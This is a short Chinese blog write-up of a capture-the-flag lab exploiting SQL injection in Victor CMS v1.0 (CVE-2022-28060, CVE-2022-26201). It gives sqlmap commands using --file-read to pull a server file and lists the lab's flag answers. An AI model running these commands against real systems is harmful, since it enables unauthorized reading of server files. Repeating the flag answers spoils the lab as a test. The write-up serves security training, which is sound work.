[春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag

博客介绍了CVE-2022-28060和CVE-2022-26201两个漏洞的CTF解题方法。通过登录抓包、使用sqlmap工具,手动输入Y回车,跑完后根据提示打开文件夹拿flag。总结指出sql注入类CTF可根据特定命令从数据库下载flag。

CVE-2022-28060

 访问题目提示的login.php,登录框登录抓包,保存为2.txt,sqlmap跑起来

 python3 sqlmap.py -r 2.txt  --file-read "/flag" --dbms Mysql

时间3分钟左右,自己手动输入Y后回车,跑完根据提示打开文件夹,拿到flag 

动下小手来个赞吧~~~

flag{bb728a3c-5fdd-4818-94c3-d2fdc7984561}

CVE-2022-26201

 和上面同类型,点击首页上面banner的admin,未授权直接进入,找到如图的注入点

  抓包,保存为3.txt,sqlmap跑起来,跟上面一样了

python3 sqlmap.py -r 3.txt --file-read "/flag" --dbms Mysql

时间也是3分钟左右,自己手动输入Y后回车,跑完根据提示打开文件夹,拿到flag   

 动下小手来个赞吧~~~

flag{30dc0399-c6e1-4d81-82a1-0d35507a50eb}

总结:sql注入类ctf,直接根据--file-read "/flag" --dbms Mysql可以从数据库把flag down下来。

留个关注哦~~~

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值